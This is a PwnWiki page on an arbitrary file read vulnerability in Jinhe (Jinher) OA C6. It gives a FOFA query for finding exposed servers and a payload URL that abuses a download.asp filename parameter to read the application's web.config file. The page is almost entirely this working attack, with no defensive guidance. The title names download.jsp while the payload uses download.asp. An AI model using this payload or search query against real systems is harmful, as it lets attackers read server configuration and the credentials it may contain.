Jinhe OA C6 download.jsp arbitrary file reading vulnerability

From PwnWiki

Revision as of 10:38, 24 June 2021 by Pwnwiki (talk | contribs) (Created page with "Read web.config")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎English • ‎中文（中国大陆）‎

Vulnerability Impact

Jinhe OA

FOFA

app="Jinher-OA"

Payload

/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

Read web.config

/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

Retrieved from "https://pwnwiki.com/index.php?title=金和OA_C6_download.jsp_任意文件讀取漏洞/en&oldid=5836"